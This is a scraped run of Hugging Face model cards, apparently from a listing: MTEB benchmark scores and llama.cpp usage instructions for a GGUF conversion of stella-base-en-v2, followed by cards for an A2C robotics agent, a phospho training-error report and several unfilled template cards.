name: MTEB SprintDuplicateQuestions
type: mteb/sprintduplicatequestions-pairclassification
config: default
split: test
revision: d66bd1f72af766a5cc4b0ca5e00c162f89e8cc46
metrics:
- type: cos_sim_accuracy
value: 99.83069306930693
- type: cos_sim_ap
value: 95.69184662911199
- type: cos_sim_f1
value: 91.4027149321267
- type: cos_sim_precision
value: 91.91102123356926
- type: cos_sim_recall
value: 90.9
- type: dot_accuracy
value: 99.69405940594059
- type: dot_ap
value: 90.21674151456216
- type: dot_f1
value: 84.4489179667841
- type: dot_precision
value: 85.00506585612969
- type: dot_recall
value: 83.89999999999999
- type: euclidean_accuracy
value: 99.83069306930693
- type: euclidean_ap
value: 95.67760109671087
- type: euclidean_f1
value: 91.19754350051177
- type: euclidean_precision
value: 93.39622641509435
- type: euclidean_recall
value: 89.1
- type: manhattan_accuracy
value: 99.83267326732673
- type: manhattan_ap
value: 95.69771347732625
- type: manhattan_f1
value: 91.32420091324201
- type: manhattan_precision
value: 92.68795056642637
- type: manhattan_recall
value: 90.0
- type: max_accuracy
value: 99.83267326732673
- type: max_ap
value: 95.69771347732625
- type: max_f1
value: 91.4027149321267
- task:
type: Clustering
dataset:
name: MTEB StackExchangeClustering
type: mteb/stackexchange-clustering
config: default
split: test
revision: 6cbc1f7b2bc0622f2e39d2c77fa502909748c259
metrics:
- type: v_measure
value: 64.47378332953092
- task:
type: Clustering
dataset:
name: MTEB StackExchangeClusteringP2P
type: mteb/stackexchange-clustering-p2p
config: default
split: test
revision: 815ca46b2622cec33ccafc3735d572c266efdb44
metrics:
- type: v_measure
value: 33.79602531604151
- task:
type: Reranking
dataset:
name: MTEB StackOverflowDupQuestions
type: mteb/stackoverflowdupquestions-reranking
config: default
split: test
revision: e185fbe320c72810689fc5848eb6114e1ef5ec69
metrics:
- type: map
value: 53.80707639107175
- type: mrr
value: 54.64886522790935
- task:
type: Summarization
dataset:
name: MTEB SummEval
type: mteb/summeval
config: default
split: test
revision: cda12ad7615edc362dbf25a00fdd61d3b1eaf93c
metrics:
- type: cos_sim_pearson
value: 30.852448373051395
- type: cos_sim_spearman
value: 32.51821499493775
- type: dot_pearson
value: 30.390650062190456
- type: dot_spearman
value: 30.588836159667636
- task:
type: Retrieval
dataset:
name: MTEB TRECCOVID
type: trec-covid
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 0.198
- type: map_at_10
value: 1.51
- type: map_at_100
value: 8.882
- type: map_at_1000
value: 22.181
- type: map_at_3
value: 0.553
- type: map_at_5
value: 0.843
- type: mrr_at_1
value: 74.0
- type: mrr_at_10
value: 84.89999999999999
- type: mrr_at_100
value: 84.89999999999999
- type: mrr_at_1000
value: 84.89999999999999
- type: mrr_at_3
value: 84.0
- type: mrr_at_5
value: 84.89999999999999
- type: ndcg_at_1
value: 68.0
- type: ndcg_at_10
value: 64.792
- type: ndcg_at_100
value: 51.37199999999999
- type: ndcg_at_1000
value: 47.392
- type: ndcg_at_3
value: 68.46900000000001
- type: ndcg_at_5
value: 67.084
- type: precision_at_1
value: 74.0
- type: precision_at_10
value: 69.39999999999999
- type: precision_at_100
value: 53.080000000000005
- type: precision_at_1000
value: 21.258
- type: precision_at_3
value: 76.0
- type: precision_at_5
value: 73.2
- type: recall_at_1
value: 0.198
- type: recall_at_10
value: 1.7950000000000002
- type: recall_at_100
value: 12.626999999999999
- type: recall_at_1000
value: 44.84
- type: recall_at_3
value: 0.611
- type: recall_at_5
value: 0.959
- task:
type: Retrieval
dataset:
name: MTEB Touche2020
type: webis-touche2020
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 1.4949999999999999
- type: map_at_10
value: 8.797
- type: map_at_100
value: 14.889
- type: map_at_1000
value: 16.309
- type: map_at_3
value: 4.389
- type: map_at_5
value: 6.776
- type: mrr_at_1
value: 18.367
- type: mrr_at_10
value: 35.844
- type: mrr_at_100
value: 37.119
- type: mrr_at_1000
value: 37.119
- type: mrr_at_3
value: 30.612000000000002
- type: mrr_at_5
value: 33.163
- type: ndcg_at_1
value: 16.326999999999998
- type: ndcg_at_10
value: 21.9
- type: ndcg_at_100
value: 34.705000000000005
- type: ndcg_at_1000
value: 45.709
- type: ndcg_at_3
value: 22.7
- type: ndcg_at_5
value: 23.197000000000003
- type: precision_at_1
value: 18.367
- type: precision_at_10
value: 21.02
- type: precision_at_100
value: 7.714
- type: precision_at_1000
value: 1.504
- type: precision_at_3
value: 26.531
- type: precision_at_5
value: 26.122
- type: recall_at_1
value: 1.4949999999999999
- type: recall_at_10
value: 15.504000000000001
- type: recall_at_100
value: 47.978
- type: recall_at_1000
value: 81.56
- type: recall_at_3
value: 5.569
- type: recall_at_5
value: 9.821
- task:
type: Classification
dataset:
name: MTEB ToxicConversationsClassification
type: mteb/toxic_conversations_50k
config: default
split: test
revision: d7c0de2777da35d6aae2200a62c6e0e5af397c4c
metrics:
- type: accuracy
value: 72.99279999999999
- type: ap
value: 15.459189680101492
- type: f1
value: 56.33023271441895
- task:
type: Classification
dataset:
name: MTEB TweetSentimentExtractionClassification
type: mteb/tweet_sentiment_extraction
config: default
split: test
revision: d604517c81ca91fe16a244d1248fc021f9ecee7a
metrics:
- type: accuracy
value: 63.070175438596486
- type: f1
value: 63.28070758709465
- task:
type: Clustering
dataset:
name: MTEB TwentyNewsgroupsClustering
type: mteb/twentynewsgroups-clustering
config: default
split: test
revision: 6125ec4e24fa026cec8a478383ee943acfbd5449
metrics:
- type: v_measure
value: 50.076231309703054
- task:
type: PairClassification
dataset:
name: MTEB TwitterSemEval2015
type: mteb/twittersemeval2015-pairclassification
config: default
split: test
revision: 70970daeab8776df92f5ea462b6173c0b46fd2d1
metrics:
- type: cos_sim_accuracy
value: 87.21463908922931
- type: cos_sim_ap
value: 77.67287017966282
- type: cos_sim_f1
value: 70.34412955465588
- type: cos_sim_precision
value: 67.57413709285368
- type: cos_sim_recall
value: 73.35092348284961
- type: dot_accuracy
value: 85.04500208618943
- type: dot_ap
value: 70.4075203869744
- type: dot_f1
value: 66.18172537008678
- type: dot_precision
value: 64.08798813643104
- type: dot_recall
value: 68.41688654353561
- type: euclidean_accuracy
value: 87.17887584192646
- type: euclidean_ap
value: 77.5774128274464
- type: euclidean_f1
value: 70.09307972480777
- type: euclidean_precision
value: 71.70852884349986
- type: euclidean_recall
value: 68.54881266490766
- type: manhattan_accuracy
value: 87.28020504261787
- type: manhattan_ap
value: 77.57835820297892
- type: manhattan_f1
value: 70.23063591521131
- type: manhattan_precision
value: 70.97817299919159
- type: manhattan_recall
value: 69.49868073878628
- type: max_accuracy
value: 87.28020504261787
- type: max_ap
value: 77.67287017966282
- type: max_f1
value: 70.34412955465588
- task:
type: PairClassification
dataset:
name: MTEB TwitterURLCorpus
type: mteb/twitterurlcorpus-pairclassification
config: default
split: test
revision: 8b6510b0b1fa4e4c4f879467980e9be563ec1cdf
metrics:
- type: cos_sim_accuracy
value: 88.96650754841464
- type: cos_sim_ap
value: 86.00185968965064
- type: cos_sim_f1
value: 77.95861256351718
- type: cos_sim_precision
value: 74.70712773465067
- type: cos_sim_recall
value: 81.50600554357868
- type: dot_accuracy
value: 87.36950362867233
- type: dot_ap
value: 82.22071181147555
- type: dot_f1
value: 74.85680716698488
- type: dot_precision
value: 71.54688377316114
- type: dot_recall
value: 78.48783492454572
- type: euclidean_accuracy
value: 88.99561454573679
- type: euclidean_ap
value: 86.15882097229648
- type: euclidean_f1
value: 78.18463125322332
- type: euclidean_precision
value: 74.95408956067241
- type: euclidean_recall
value: 81.70619032953496
- type: manhattan_accuracy
value: 88.96650754841464
- type: manhattan_ap
value: 86.13133111232099
- type: manhattan_f1
value: 78.10771470160115
- type: manhattan_precision
value: 74.05465084184377
- type: manhattan_recall
value: 82.63012011087157
- type: max_accuracy
value: 88.99561454573679
- type: max_ap
value: 86.15882097229648
- type: max_f1
value: 78.18463125322332
---
# kalle07/stella-base-en-v2-Q8_0-GGUF
This model was converted to GGUF format from [`infgrad/stella-base-en-v2`](https://huggingface.co/infgrad/stella-base-en-v2) using llama.cpp via ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/infgrad/stella-base-en-v2) for more details on the model.
## Use with llama.cpp
Install llama.cpp via Homebrew (works on macOS and Linux):
```bash
brew install llama.cpp
```
Invoke the llama.cpp server or the CLI.
### CLI:
```bash
llama-cli --hf-repo kalle07/stella-base-en-v2-Q8_0-GGUF --hf-file stella-base-en-v2-q8_0.gguf -p "The meaning to life and the universe is"
```
### Server:
```bash
llama-server --hf-repo kalle07/stella-base-en-v2-Q8_0-GGUF --hf-file stella-base-en-v2-q8_0.gguf -c 2048
```
Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the llama.cpp repo.
Step 1: Clone llama.cpp from GitHub.
```bash
git clone https://github.com/ggerganov/llama.cpp
```
Step 2: Move into the llama.cpp folder and build it with the `LLAMA_CURL=1` flag, along with any hardware-specific flags (e.g., `LLAMA_CUDA=1` for Nvidia GPUs on Linux).
```bash
cd llama.cpp && LLAMA_CURL=1 make
```
Step 3: Run inference through the main binary.
```bash
./llama-cli --hf-repo kalle07/stella-base-en-v2-Q8_0-GGUF --hf-file stella-base-en-v2-q8_0.gguf -p "The meaning to life and the universe is"
```
or
```bash
./llama-server --hf-repo kalle07/stella-base-en-v2-Q8_0-GGUF --hf-file stella-base-en-v2-q8_0.gguf -c 2048
```
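Since `stella-base-en-v2` is a sentence-embedding model, the GGUF file can also be used from Python through llama-cpp-python. The sketch below is a minimal, hedged example: it assumes `pip install llama-cpp-python` and that the `.gguf` file has already been downloaded locally (the path passed to `embed_texts` is whatever you saved it as, not a fixed name).

```python
import math


def cosine(a, b):
    """Cosine similarity between two equal-length embedding vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(x * x for x in b))
    return dot / (norm_a * norm_b)


def embed_texts(model_path, texts):
    """Embed a list of strings with llama-cpp-python.

    Assumes a local GGUF file at `model_path`; the import is kept inside the
    function so the pure helper above works without llama-cpp-python installed.
    """
    from llama_cpp import Llama
    llm = Llama(model_path=model_path, embedding=True)
    return [llm.embed(t) for t in texts]
```

For example, `embed_texts("stella-base-en-v2-q8_0.gguf", ["a", "b"])` returns two vectors you can compare with `cosine`.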
|
dhadheechi/a2c-PandaReachDense-v3 | dhadheechi | 2025-06-09T09:22:26Z | 0 | 0 | stable-baselines3 | [
"stable-baselines3",
"PandaReachDense-v3",
"deep-reinforcement-learning",
"reinforcement-learning",
"model-index",
"region:us"
] | reinforcement-learning | 2025-06-09T09:18:19Z | ---
library_name: stable-baselines3
tags:
- PandaReachDense-v3
- deep-reinforcement-learning
- reinforcement-learning
- stable-baselines3
model-index:
- name: A2C
results:
- task:
type: reinforcement-learning
name: reinforcement-learning
dataset:
name: PandaReachDense-v3
type: PandaReachDense-v3
metrics:
- type: mean_reward
value: -0.19 +/- 0.11
name: mean_reward
verified: false
---
# **A2C** Agent playing **PandaReachDense-v3**
This is a trained model of an **A2C** agent playing **PandaReachDense-v3**
using the [stable-baselines3 library](https://github.com/DLR-RM/stable-baselines3).
## Usage (with Stable-baselines3)
TODO: Add your code
```python
from stable_baselines3 import ...
from huggingface_sb3 import load_from_hub
...
```
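Until the card is filled in, the following is a hedged sketch of how such a checkpoint is typically loaded and evaluated. The checkpoint filename is an assumption (SB3 uploads usually ship a zip named after the environment), and it ignores any `VecNormalize` statistics that may accompany the checkpoint; it requires `stable-baselines3`, `huggingface_sb3`, `gymnasium`, and `panda-gym`.

```python
def mean_reward(returns):
    """Average episodic return over a list of episode totals."""
    return sum(returns) / len(returns)


def evaluate_from_hub(repo_id="dhadheechi/a2c-PandaReachDense-v3",
                      filename="a2c-PandaReachDense-v3.zip",  # assumed filename
                      n_episodes=5):
    """Download the checkpoint from the Hub and roll out deterministic episodes."""
    import gymnasium as gym
    import panda_gym  # noqa: F401  (registers the Panda environments)
    from huggingface_sb3 import load_from_hub
    from stable_baselines3 import A2C

    checkpoint = load_from_hub(repo_id, filename)
    model = A2C.load(checkpoint)
    env = gym.make("PandaReachDense-v3")
    returns = []
    for _ in range(n_episodes):
        obs, _ = env.reset()
        done, total = False, 0.0
        while not done:
            action, _ = model.predict(obs, deterministic=True)
            obs, reward, terminated, truncated, _ = env.step(action)
            total += float(reward)
            done = terminated or truncated
        returns.append(total)
    return mean_reward(returns)
```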
|
MJ92/Llama-2-7b-chat-hf_finetuned_cass_1000 | MJ92 | 2025-06-09T09:20:48Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T09:10:17Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
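Until the author fills this in, here is a minimal hedged sketch based only on this card's metadata (a `llama` text-generation checkpoint in the `transformers` library); the prompt and generation settings are illustrative:

```python
from transformers import pipeline

# Repo id comes from this card's metadata; prompt and settings are illustrative.
generator = pipeline(
    "text-generation",
    model="MJ92/Llama-2-7b-chat-hf_finetuned_cass_1000",
)
print(generator("Hello, how are you?", max_new_tokens=32)[0]["generated_text"])
```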
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
bertin-project/bertin-gpt-j-6B-boe-summaries | bertin-project | 2025-06-09T09:19:14Z | 21 | 0 | transformers | [
"transformers",
"pytorch",
"safetensors",
"gptj",
"text-generation",
"es",
"dataset:bertin-project/BOE-XSUM",
"base_model:bertin-project/bertin-gpt-j-6B",
"base_model:finetune:bertin-project/bertin-gpt-j-6B",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-02-01T14:19:56Z | ---
license: apache-2.0
language:
- es
base_model:
- bertin-project/bertin-gpt-j-6B
pipeline_tag: text-generation
library_name: transformers
datasets:
- bertin-project/BOE-XSUM
--- |
phospho-app/oulianov-ACT_BBOX-TEST7-q0utt | phospho-app | 2025-06-09T09:18:35Z | 0 | 0 | null | [
"phosphobot",
"act",
"region:us"
] | null | 2025-06-09T09:16:31Z |
---
tags:
- phosphobot
- act
task_categories:
- robotics
---
# act Model - phospho Training Pipeline
## Error Traceback
We faced an issue while training your model.
```
Caught KeyError in DataLoader worker process 1.
Original Traceback (most recent call last):
File "/opt/conda/lib/python3.11/site-packages/torch/utils/data/_utils/worker.py", line 349, in _worker_loop
data = fetcher.fetch(index) # type: ignore[possibly-undefined]
^^^^^^^^^^^^^^^^^^^^
File "/opt/conda/lib/python3.11/site-packages/torch/utils/data/_utils/fetch.py", line 55, in fetch
return self.collate_fn(data)
^^^^^^^^^^^^^^^^^^^^^
File "/opt/conda/lib/python3.11/site-packages/torch/utils/data/_utils/collate.py", line 398, in default_collate
return collate(batch, collate_fn_map=default_collate_fn_map)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/conda/lib/python3.11/site-packages/torch/utils/data/_utils/collate.py", line 171, in collate
{
File "/opt/conda/lib/python3.11/site-packages/torch/utils/data/_utils/collate.py", line 173, in <dictcomp>
[d[key] for d in batch], collate_fn_map=collate_fn_map
^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/conda/lib/python3.11/site-packages/torch/utils/data/_utils/collate.py", line 173, in <listcomp>
[d[key] for d in batch], collate_fn_map=collate_fn_map
~^^^^^
KeyError: 'observation.environment_state'
```
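The `KeyError` above is raised by PyTorch's default collate function: it takes the key set of the *first* sample in the batch and indexes every other sample with those keys, so any sample that lacks `observation.environment_state` fails exactly as in the traceback. A minimal standalone repro (toy tensors standing in for the actual dataset items):

```python
import torch
from torch.utils.data import default_collate

# Toy samples standing in for dataset items; only the key mismatch matters.
sample_a = {"observation.state": torch.tensor([0.1]),
            "observation.environment_state": torch.tensor([0.0])}
sample_b = {"observation.state": torch.tensor([0.2])}  # key missing here

try:
    default_collate([sample_a, sample_b])
except KeyError as err:
    print(f"KeyError: {err}")  # KeyError: 'observation.environment_state'
```

The usual fix is to make every dataset item expose the same feature keys, or to drop the inconsistent key before training.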
## Training parameters:
- **Dataset**: [Lithium73fr/TEST7](https://huggingface.co/datasets/Lithium73fr/TEST7)
- **Wandb run URL**: None
- **Epochs**: None
- **Batch size**: 100
- **Training steps**: 10000
📖 **Get Started**: [docs.phospho.ai](https://docs.phospho.ai?utm_source=huggingface_readme)
🤖 **Get your robot**: [robots.phospho.ai](https://robots.phospho.ai?utm_source=huggingface_readme)
|
KatrinaSky/llama_paul | KatrinaSky | 2025-06-09T09:14:19Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"unsloth",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-05-26T07:47:07Z | ---
library_name: transformers
tags:
- unsloth
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Johnny1188/Qwen3-0.6B-S2 | Johnny1188 | 2025-06-09T09:03:46Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T09:03:04Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
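Until the author provides a snippet, a minimal hedged sketch based only on this card's metadata (a `qwen3` conversational checkpoint); the message content and generation settings are illustrative:

```python
from transformers import AutoModelForCausalLM, AutoTokenizer

repo = "Johnny1188/Qwen3-0.6B-S2"  # repo id taken from this card's metadata
tokenizer = AutoTokenizer.from_pretrained(repo)
model = AutoModelForCausalLM.from_pretrained(repo)

# Build a chat prompt with the model's own chat template, then generate.
messages = [{"role": "user", "content": "Give me a one-sentence fun fact."}]
inputs = tokenizer.apply_chat_template(messages, add_generation_prompt=True, return_tensors="pt")
outputs = model.generate(inputs, max_new_tokens=64)
print(tokenizer.decode(outputs[0][inputs.shape[-1]:], skip_special_tokens=True))
```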
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
minjeongHuggingFace/koalpaca-bang-finetuned | minjeongHuggingFace | 2025-06-09T09:00:08Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"gpt_neox",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T08:57:32Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
